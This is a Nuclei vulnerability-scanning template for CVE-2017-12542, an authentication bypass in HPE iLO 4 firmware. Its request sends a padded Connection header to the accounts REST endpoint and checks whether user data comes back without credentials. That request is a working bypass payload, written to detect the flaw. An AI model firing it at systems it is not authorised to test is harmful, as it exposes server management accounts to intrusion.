nuclei-templates/http/cves/2017/CVE-2017-12542.yaml

54 lines
1.7 KiB
YAML

id: CVE-2017-12542
info:
name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
author: pikpikcu
severity: critical
description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
remediation: |
Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/44005
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
- https://www.exploit-db.com/exploits/44005/
- http://www.securitytracker.com/id/1039222
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-12542
epss-score: 0.97377
epss-percentile: 0.99878
cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: hp
product: integrated_lights-out_4_firmware
tags: ilo4,hpe,auth-bypass,edb,cve,cve2017
http:
- method: GET
path:
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
headers:
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
matchers-condition: and
matchers:
- type: word
part: body
words:
- "iLO User"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a0046304402206b024e8dd6e7b788d618bc79eaa434bb9a915a288f319716d24e41eef7935e67022014896ffcb97976cd069c465f7c49ff1043b30845a09020c39625ffbdc46492b8:922c64590222798bb761d5b6d8e72950